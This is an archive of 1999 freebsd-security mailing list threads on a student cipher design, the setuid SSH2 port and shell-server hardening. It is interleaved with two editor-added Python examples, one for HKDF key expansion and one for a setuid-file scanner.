> | there's no reason it's gotta be bad. I'm building a symmetric algorithm
> | that is designed to specifically handle large keys ie >1024 bytes. If
> | anyone has any hints or suggestions, I'm open to them...in fact that's
> | why I'm writing this in the first place. If it works well, maybe
> | someday people will actually use it, then again maybe not. thanks for
> | your time.
>
> Actually, this will be 1. broken, and 2. uninteresting. I'd be happy
> to bet money if it wasn't a sucker bet.
>
> 1. Building a cipher with a large key is hard. See the first twofish
> paper, where Schneier et al, discuss the difficulty of building a key
> schedule to effectively use long keys. Getting 1024 BYTES of
> randomness is next to impossible, so your implementors will end up
> expanding a smaller pool of randomness into a large key. Given that
> this is unavoidable, you should anticipate it in your design, and have
> a key expansion phase. That you didn't know this is worrisome.
>

I do know I need key expansion, I'm in the process of trying to decide how to implement it. Also, it should read 1024 bits not bytes, sorry for that. I've further scaled down to 512 bits anyway.

> 2. Building a system to use more resources than current systems, and
> expecting resource consumption to make it interesting is silly.
>
> If you want an interesting project, may I suggest trying to
> cryptanalyze one of the AES candidates? It's more interesting, will
> teach you a bunch, and may produce something useful.
>

I would, but the project was to code something new, not analyze something. I suppose I could've built some silly game like everyone else, but I wanted to try something different.

> Sorry to flame, but this really isn't a good use of your time.
>
> Adam
>

Agreed, it's a waste of time, and don't worry about flaming, I'm expecting it. It's really just for the sake of seeing how far I can get. I doubt I'll finish any time before when I graduate college (in 5 or 6 years).

> --
> "It is seldom that liberty of any kind is lost all at once."
> -Hume
>

From owner-freebsd-security Thu Jun 3 10:45:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E847A1555B for ; Thu, 3 Jun 1999 10:45:43 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59726; Thu, 3 Jun 1999 10:45:21 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 10:45:21 -0700
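The "key expansion phase" Adam Shostack asks for in the exchange above (turning a small pool of randomness into a long key) is exactly what a key derivation function does. The block below is an added example for this archive, not code from anyone in the thread: HKDF (RFC 5869, which postdates this 1999 discussion) over HMAC-SHA256, used to stretch a short seed into the 512-bit key the poster settled on. The function names, the labels and the fixed 16-byte seed are this example's own assumptions, and the self-check uses the RFC's published test vector.

```python
import hashlib
import hmac

HASH = hashlib.sha256
HASH_LEN = HASH().digest_size  # 32 bytes for SHA-256


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869, section 2.2): condense the input keying
    material into one fixed-length pseudorandom key (PRK). An empty salt
    is replaced by HASH_LEN zero bytes, as the RFC specifies."""
    if not salt:
        salt = b"\x00" * HASH_LEN
    return hmac.new(salt, ikm, HASH).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """HKDF-Expand (section 2.3): T(i) = HMAC(PRK, T(i-1) || info || i);
    the output is T(1) || T(2) || ... truncated to `length` bytes."""
    if length > 255 * HASH_LEN:
        raise ValueError("HKDF-Expand output is limited to 255 * HashLen bytes")
    okm = b""
    block = b""
    counter = 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def expand_cipher_key(seed: bytes, label: bytes, key_bits: int, salt: bytes = b"") -> bytes:
    """Turn a short random seed into a key_bits-long cipher key.

    The expansion is deterministic, so the number of keys an attacker must
    try is bounded by the seed's entropy, not by key_bits: a 512-bit key
    expanded from 128 random bits still has only 2**128 possible values.
    `label` keeps keys derived for different purposes from one seed apart."""
    if key_bits % 8:
        raise ValueError("key length must be a whole number of bytes")
    prk = hkdf_extract(salt, seed)
    return hkdf_expand(prk, label, key_bits // 8)


def rfc5869_selfcheck() -> bool:
    """Known-answer check of the two primitives above against test case 1
    in RFC 5869, appendix A."""
    ikm = bytes.fromhex("0b" * 22)
    salt = bytes.fromhex("000102030405060708090a0b0c")
    info = bytes.fromhex("f0f1f2f3f4f5f6f7f8f9")
    prk = hkdf_extract(salt, ikm)
    okm = hkdf_expand(prk, info, 42)
    return (prk.hex() == "077709362c2e32df0ddc3f0dc47bba6390b6c73bb50f9c3122ec844ad7c2b3e5"
            and okm.hex() == "3cb25f25faacd57a90434f64d0362f2a2d2d0a90cf1a5a4c5db02d56ecc4c5bf"
                             "34007208d5b887185865")


def demo() -> dict:
    """Expand one constructed 16-byte seed into two 512-bit keys under
    different labels (one for encryption, one for a MAC)."""
    seed = b"\x42" * 16  # constructed fixed seed for the demo; use os.urandom(16) in practice
    return {
        "enc": expand_cipher_key(seed, b"demo-cipher enc", 512),
        "mac": expand_cipher_key(seed, b"demo-cipher mac", 512),
    }
```

The point the thread makes survives the expansion: the 512-bit output of `demo()` is no stronger than the 128 bits that went into it, and a cipher design that advertises the long key without saying so is advertising the wrong number.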
From: Matthew Hunt To: Unknow User Cc: Bill Fumerola , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603104521.I58665@wopr.caltech.edu> References: <375693C1.68C59211@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <375693C1.68C59211@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:40:01PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 02:40:01PM +0000, Unknow User wrote:

> The problem is that we never know what SUID a port will install!
> It happens that others have the same "false sense of security" I have:

You smoke crack.

How do you know what SUID binaries any software will install? You read the source! You can do exactly the same for the Ports Collection. It's all plain English (or at least plain Makefile) for your perusal. You even get a nice listing of what files were installed, so you can examine them yourself. Most source tarballs do not provide that information.

I think you need to learn how the Ports Collection works before you condemn it. You clearly do not understand it all.

I also think it's odd that you think we would introduce security risks into software deliberately. I mean, we're the same people who can and do change the rest of FreeBSD. Presumably you trust us to do that right, or have you read all of /usr/src? If I wanted to introduce a security hole, I'd bury it somewhere in the FreeBSD userland, not in ports, to make sure everyone got it.

Sheesh.

--
Matthew Hunt * UNIX is a lever for the
http://www.pobox.com/~mph/ * intellect. -J.R. Mashey

From owner-freebsd-security Thu Jun 3 10:47:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id BDB35159A9 for ; Thu, 3 Jun 1999 10:47:19 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id NAA01840; Thu, 3 Jun 1999 13:49:48 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Thu, 3 Jun 1999 13:49:48 -0400 (EDT)
From: Bill Fumerola To: Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <375693C1.68C59211@tdnet.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Unknow User wrote:

> The problem is that we never know what SUID a port will install!
> It happens that others have the same "false sense of security" I have:
>
> Look at this: http://www.freebsd.org/~jkb/howto.html

That file references the port, what are you talking about?

And go see http://www.FreeBSD.org/~billf/ssh-from-ports.html

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Thu Jun 3 10:50:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.intercom.com (mail.intercom.com [206.98.165.10]) by hub.freebsd.org (Postfix) with ESMTP id 0E8F315976 for ; Thu, 3 Jun 1999 10:50:09 -0700 (PDT) (envelope-from jason@intercom.com) Received: from mail.intercom.com (mail.intercom.com [206.98.165.10]) by mail.intercom.com (8.9.0/8.9.0) with ESMTP id NAA09607 for ; Thu, 3 Jun 1999 13:50:04 -0400 (EDT) Date: Thu, 3 Jun 1999 13:50:04 -0400 (EDT)
From: "Jason J. Horton" To: freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <19990603103731.G58665@wopr.caltech.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Has anyone run into the problem that SSH2 on a 3.1-RELEASE system will not allow a non-root user to log in? Root can log in fine, but any standard user cannot. When I enable telnet and ftp, standard users can log in fine, but no ssh.

-Jason J. Horton
Head Busboy
Intercom Online Inc.
212.378.2202 | http://www.intercom.com

From owner-freebsd-security Thu Jun 3 11:03:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 1FAAE14CFF for ; Thu, 3 Jun 1999 11:03:08 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id LAA24109; Thu, 3 Jun 1999 11:02:14 -0700 (PDT) Message-ID: <19990603110213.B19566@best.com> Date: Thu, 3 Jun 1999 11:02:14 -0700
From: "Jan B. Koum " To: Bill Fumerola , Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) References: <375690E3.4BC9BB94@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Bill Fumerola on Thu, Jun 03, 1999 at 01:38:26PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 01:38:26PM -0400, Bill Fumerola wrote:
> On Thu, 3 Jun 1999, Unknow User wrote:
>
> > No, I never use ports (Due to security problem)!
> > I always get the source!
> >
> > Any tips?
>
> Manually apply the patch or use the source and figure it out for yourself.
>
> Stop doing things the hard way just for a false sense of security.

Ports will install ssh client suid, where I am 99% sure you don't need the client to be suid. I always do '--disable-suid-ssh' when rolling out new ssh.

Most of the software can be tweaked to be more secure during the build time .. sudo can be tweaked to switch to non-root user by default, for example. (So you can create user 'blah' to which people can _only_ sudo and hence work in a sandbox of a single user).

-- yan

From owner-freebsd-security Thu Jun 3 11:10:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id 2F1E414CAC for ; Thu, 3 Jun 1999 11:10:33 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA60304; Thu, 3 Jun 1999 11:09:57 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 11:09:57 -0700
From: Matthew Hunt To: "Jan B. Koum " Cc: Bill Fumerola , Unknow User , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603110957.C59847@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990603110213.B19566@best.com>; from Jan B. Koum on Thu, Jun 03, 1999 at 11:02:14AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 11:02:14AM -0700, Jan B. Koum wrote:

> Ports will install ssh client suid, where I am 99% sure you don't
> need the client to be suid. I always do '--disable-suid-ssh' when rolling
> out new ssh.

Why does it build SUID as shipped? What are the implications of installing it otherwise? The port can certainly be changed, if the Right Way is with --disable-suid-ssh.

In any case, anyone can add --disable-suid-ssh to the CONFIGURE_ARGS line of the port Makefile, and still derive the benefit of the login.conf patches, pkg_delete, and so forth.

It seems that the original poster isn't even willing to just apply the appropriate patch from the port to solve his problem. I really do not understand the confusion that is at work here.

Matt

--
Matthew Hunt * Inertia is a property
http://www.pobox.com/~mph/ * of matter.

From owner-freebsd-security Thu Jun 3 11:12:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 7500D15293 for ; Thu, 3 Jun 1999 11:12:48 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id MAA28789; Thu, 3 Jun 1999 12:12:13 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.3/8.9.1) id MAA62390; Thu, 3 Jun 1999 12:12:13 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Thu, 3 Jun 1999 12:12:13 -0600 (MDT)
From: "David G. Andersen" To: Matthew Hunt Cc: "Jan B. Koum " , Bill Fumerola , Unknow User , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Matthew Hunt's message of Thu, June 3 1999 <19990603110957.C59847@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> <19990603110957.C59847@wopr.caltech.edu> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14166.50513.861526.155312@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

It's SUID so it can obtain the local host private key, for authentication to the remote machine. This is necessary if you use ssh with .rhosts/.shosts functionality.

If you don't care about this functionality, then you don't need it to be suid.

-Dave

Lo and Behold, Matthew Hunt said:
> On Thu, Jun 03, 1999 at 11:02:14AM -0700, Jan B. Koum wrote:
>
> > Ports will install ssh client suid, where I am 99% sure you don't
> > need the client to be suid. I always do '--disable-suid-ssh' when rolling
> > out new ssh.
>
> Why does it build SUID as shipped? What are the implications of
> installing it otherwise? The port can certainly be changed, if the
> Right Way is with --disable-suid-ssh.
>
> In any case, anyone can add --disable-suid-ssh to the CONFIGURE_ARGS
> line of the port Makefile, and still derive the benefit of the login.conf
> patches, pkg_delete, and so forth.
>
> It seems that the original poster isn't even willing to just apply
> the appropriate patch from the port to solve his problem. I really
> do not understand the confusion that is at work here.
>
> Matt
>
> --
> Matthew Hunt * Inertia is a property
> http://www.pobox.com/~mph/ * of matter.
>

--
work: danderse@cs.utah.edu me: angio@pobox.com
University of Utah http://www.angio.net/
Computer Science - Flux Research Group "What's footnote FIVE?"

From owner-freebsd-security Thu Jun 3 11:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E16A814C1F for ; Thu, 3 Jun 1999 11:18:24 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA60549; Thu, 3 Jun 1999 11:17:46 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 11:17:46 -0700
From: Matthew Hunt To: "David G. Andersen" Cc: "Jan B. Koum " , Bill Fumerola , Unknow User , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603111746.A60419@wopr.caltech.edu> References: <375690E3.4BC9BB94@tdnet.com.br> <19990603110213.B19566@best.com> <19990603110957.C59847@wopr.caltech.edu> <14166.50513.861526.155312@torrey.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <14166.50513.861526.155312@torrey.cs.utah.edu>; from David G. Andersen on Thu, Jun 03, 1999 at 12:12:13PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 12:12:13PM -0600, David G. Andersen wrote:

> It's SUID so it can obtain the local host private key, for
> authentication to the remote machine. This is necessary if you use
> ssh with .rhosts/.shosts functionality.
>
> If you don't care about this functionality, then you don't need it to
> be suid.

Maybe it would be good if we keep the current behavior as a default, and add some sort of DISABLE_SUID option to the build?

Yan, I'm not sure I like the comment on your web page advising people to avoid ports and packages. There's no reason to avoid the ports or packages if you're willing to spend a little time looking at them, like you have to with the source tarballs anyway, and by avoiding the ports you may miss out on FreeBSD enhancements, as is the case with ssh2. I would consider the login.conf patch to be security-related.

By all means, if you have security concerns about specific ports, you should let us know!

Matt

--
Matthew Hunt * Stay close to the Vorlon.
http://www.pobox.com/~mph/ *

From owner-freebsd-security Thu Jun 3 11:27:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 66FA814D59 for ; Thu, 3 Jun 1999 11:27:18 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id OAA26094; Thu, 3 Jun 1999 14:26:46 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br> References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> Date: Thu, 3 Jun 1999 14:27:23 -0400 To: Unknow User , Matthew Hunt
From: Garance A Drosihn Subject: Re: SSH2 (in FreeBSD-Questions) Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 2:27 PM +0000 6/3/99, Unknow User wrote:
> No, I never use ports (Due to security problem)!
> I always get the source!
>
> Any tips?

Someone went to the time and trouble to fix all freebsd-related issues in ssh2, and you're just going to ignore that? Not only are you going to ignore that work, you're then going to complain about how the generally-available source does not happen to have freebsd-specific support in it?

I'm not sure what your security hangup is with the ports collection, but the first tip I'd have is that you not complain after you have explicitly ignored work which people had already done to make your life easier. Even if you don't trust ports due to some security concern, there is nothing magic about what ports do.

The second tip would be to look at the ssh2 information in ports, and do all steps yourself. You can ftp the files yourself, you can get the ports-related update file yourself, and you can figure out which of those updates you trust or don't trust by yourself. If you're going to ignore the work people did, then you're going to have to redo that work yourself. This should come as no surprise.

---
Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu
Senior Systems Programmer or drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Thu Jun 3 11:32:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id ABDD814D59 for ; Thu, 3 Jun 1999 11:32:44 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id OAA193404; Thu, 3 Jun 1999 14:32:28 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <375693C1.68C59211@tdnet.com.br> References: Date: Thu, 3 Jun 1999 14:33:05 -0400 To: Unknow User
From: Garance A Drosihn Subject: Re: SSH2 (in FreeBSD-Questions) Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 2:40 PM +0000 6/3/99, Unknow User wrote:
>Bill Fumerola wrote:
>
>> Manually apply the patch or use the source and figure it out for yourself.
>>
>> Stop doing things the hard way just for a false sense of security.
>                                            ^^^^^^^^^^^^^^^^^^^^^^^
>
>The problem is that we never know what SUID a port will install!
>It happens that others have the same "false sense of security" I have:

Yes, so instead of using the port collection, you went ahead and installed ssh2 without any freebsd-specific updates, and you were quite willing to run that program as super-user even though you clearly don't have a clue what it does, what it *needs* to do under Freebsd, or even what you are doing. This is known as a false sense of security.

>The problem is that we never know what SUID a port will install!

To answer this in another way, if you did know what you were doing, you would realize that the system checks for setuid programs every day, and sends email to root if some change occurs among setuid programs. You could monitor that email, and then you WOULD know what setuid programs were installed by a port.

---
Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu
Senior Systems Programmer or drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Thu Jun 3 13:09:08 1999 Delivered-To: freebsd-security@freebsd.org Received: from sfmailrelay.hamquist.com (sfmailrelay2.hamquist.com [199.108.89.15]) by hub.freebsd.org (Postfix) with SMTP id DC010159C6 for ; Thu, 3 Jun 1999 13:09:03 -0700 (PDT) (envelope-from rchilders@hamquist.com) Received: from 172.19.6.48 by sfmailrelay.hamquist.com with SMTP ( WorldSecure Server SMTP Relay(WSS) v3.2 SR1); Thu, 03 Jun 99 13:08:42 -0700 X-Server-Uuid: c29e0ff2-e8b9-11d1-a493-00c04fbbd7d3 Received: from hamquist.com ([172.19.6.230]) by sfmail.hamquist.com ( Netscape Messaging Server 3.6) with ESMTP id AAA3B0E; Thu, 3 Jun 1999 16:09:02 -0400 Message-ID: <3756E1C5.8C9A78CD@hamquist.com> Date: Thu, 03 Jun 1999 13:12:53 -0700
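Garance Drosihn's reply above points at the daily check for setuid programs that mails root when the list changes. The block below is an added example for this archive, not code from the thread and not FreeBSD's own /etc/security script: it walks a tree for setuid/setgid regular files without crossing filesystems, and diffs two scans the way a nightly report compares yesterday's list with today's. The directory tree it runs against is constructed in a temporary directory, the file names are made up, and the function names are this example's own.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Tuple

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setid_files(root: str) -> Dict[str, int]:
    """Return {path: permission bits} for every regular file under `root`
    carrying the setuid or setgid bit. Symlinks are not followed and other
    filesystems are not entered, like `find root -xdev -type f -perm -u+s`."""
    found: Dict[str, int] = {}
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune mount points so the scan stays on one filesystem (-xdev).
        dirnames[:] = [d for d in dirnames
                       if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev]
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID_BITS:
                found[path] = stat.S_IMODE(st.st_mode)
    return found


def diff_setid(baseline: Dict[str, int],
               current: Dict[str, int]) -> Tuple[List[str], List[str], List[str]]:
    """Compare two scans: (paths added, paths removed, paths whose mode changed)."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return added, removed, changed


def format_report(baseline: Dict[str, int], current: Dict[str, int]) -> str:
    """Render the diff in the +/-/~ style of a nightly mail to root."""
    added, removed, changed = diff_setid(baseline, current)
    if not (added or removed or changed):
        return "no change in setuid/setgid files"
    lines = [f"+ {current[p]:04o} {p}" for p in added]
    lines += [f"- {baseline[p]:04o} {p}" for p in removed]
    lines += [f"~ {baseline[p]:04o} -> {current[p]:04o} {p}" for p in changed]
    return "\n".join(lines)


def demo() -> dict:
    """Constructed scenario in a throwaway directory: take a baseline with one
    setuid file, then 'install a port' that drops a new setuid client, and
    report what the next nightly run would flag. Only an owner-writable tree
    is touched, so this runs as an ordinary user."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    try:
        os.makedirs(os.path.join(root, "usr", "local", "bin"))

        def install(rel: str, mode: int) -> str:
            path = os.path.join(root, rel)
            with open(path, "wb") as f:
                f.write(b"#!/bin/sh\nexit 0\n")  # stand-in for a binary
            os.chmod(path, mode)
            return path

        install("usr/local/bin/scp", 0o755)    # ordinary executable, never reported
        install("usr/local/bin/ssh1", 0o4755)  # already setuid when the baseline is taken
        baseline = find_setid_files(root)

        install("usr/local/bin/ssh", 0o4755)   # new setuid client dropped by a port
        current = find_setid_files(root)

        added, removed, changed = diff_setid(baseline, current)
        return {
            "baseline": sorted(os.path.relpath(p, root) for p in baseline),
            "added": [os.path.relpath(p, root) for p in added],
            "removed": removed,
            "changed": changed,
            "report": format_report(baseline, current),
        }
    finally:
        shutil.rmtree(root)
```

Run against `/` as root, `find_setid_files` gives the list the nightly check works from; keeping yesterday's result and feeding both to `format_report` is the whole mechanism. The scan only sees files that exist when it runs, so a port that installs and removes a setuid helper between two runs goes unreported; the packing list in /var/db/pkg is the place to look for that.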
From: "Richard Childers" Organization: hambrecht & quist, llc X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: "Timothy R. Platt" Cc: Subject: Re: Shell Account system References: X-WSS-ID: 1B483F402722-01-02 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

"Timothy R. Platt" wrote:

"Better install a traffic logger, or better yet ipfw."

Could someone knowledgeable comment on the differences between ipfw and SANS' SHADOW package (primarily developed on a FreeBSD platform)?

-- richard

"Timothy R. Platt" wrote:
>
> Install tripwire, it's in the ports.
>
> Better install a traffic logger, or better yet ipfw. You'll need them to
> log and report all the smurfs, fraggles, and synks you're going to get.
>
> Tim
>
> >Yeah, thanks, but the system is for anyone able to pay, so, you can say
> >I trust nobody.
> >
> >Kris Kennaway wrote:
> >>
> >> On Mon, 31 May 1999, Joe Gleason wrote:
> >>
> >> [Snip]
> >>
> >> Good advice, but running a shell account for people who you don't really
> >>trust
> >> is still not a wise move for the inexperienced, and not something you can
> >> easily document in a webpage. UNIX security is a way of life - there are any
> >> number of things which the unwary can trip over which could potentially
> >> compromise your machine.
> >>
> >> If it's for a small group of users who you trust fairly well, you
> >> probably should be okay, though.
> >
> >

From owner-freebsd-security Thu Jun 3 19:23:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from kiev.sovam.com (relay.kiev.sovam.com [194.186.143.5]) by hub.freebsd.org (Postfix) with ESMTP id 5D07614C47 for ; Thu, 3 Jun 1999 19:23:08 -0700 (PDT) (envelope-from root@triton.kiev.sovam.com) Received: from [194.186.143.7] (helo=triton.kiev.sovam.com) by kiev.sovam.com with esmtp (Exim 2.12 #1) id 10pjda-00090L-00; Fri, 4 Jun 1999 05:23:14 +0300 Received: from root by triton.kiev.sovam.com with local (Exim 2.12 #1) id 10pjdS-0002VH-00; Fri, 4 Jun 1999 05:23:06 +0300 Received: from [206.184.139.137] (helo=shell6.ba.best.com) by kiev.sovam.com with esmtp (Exim 2.12 #1) id 10nsDS-000I9R-00 for doka@kiev.sovam.com; Sun, 30 May 1999 02:08:35 +0300 Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA23069; Sat, 29 May 1999 16:08:17 -0700 (PDT) Message-ID: <19990529160817.B19679@best.com> Date: Sat, 29 May 1999 16:08:17 -0700
From: "Jan B. Koum " To: Vladimir Litovka , freebsd-security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> <7ip5fv$2n98$3@news.kiev.sovam.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <7ip5fv$2n98$3@news.kiev.sovam.com>; from Vladimir Litovka on Sat, May 29, 1999 at 04:43:43PM +0000 Status: RO X-Status: X-Keywords: X-UID: 9991 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Sat, May 29, 1999 at 04:43:43PM +0000, Vladimir Litovka wrote:
> Warren Toomey wrote:
>
> Where are these sysctl variables described? I didn't find them in man for
> sysctl - there is only a small number of variables...
>
> Thank you.
>
> --
> doka

Look in the source:

vi /usr/src/sys/netinet/tcp_input.c

-- Yan

From owner-freebsd-security Thu Jun 3 20:49:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id 3D06014D91 for ; Thu, 3 Jun 1999 20:49:46 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (2007 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 3 Jun 1999 22:34:11 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Thu, 3 Jun 1999 22:34:04 -0500 (CDT)
From: James Wyatt To: Matthew Hunt Cc: Unknow User , Bill Fumerola , freebsd-security@freebsd.org Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <19990603104521.I58665@wopr.caltech.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Matthew Hunt wrote:
> On Thu, Jun 03, 1999 at 02:40:01PM +0000, Unknow User wrote:
> > The problem is that we never know what SUID a port will install!
> > It happens that others have the same "false sense of security" I have:
>
> You smoke crack.

Just another crack expert on this list... 8()

> How do you know what SUID binaries any software will install? You
> read the source! You can do exactly the same for the Ports Collection.
> It's all plain English (or at least plain Makefile) for your perusal.

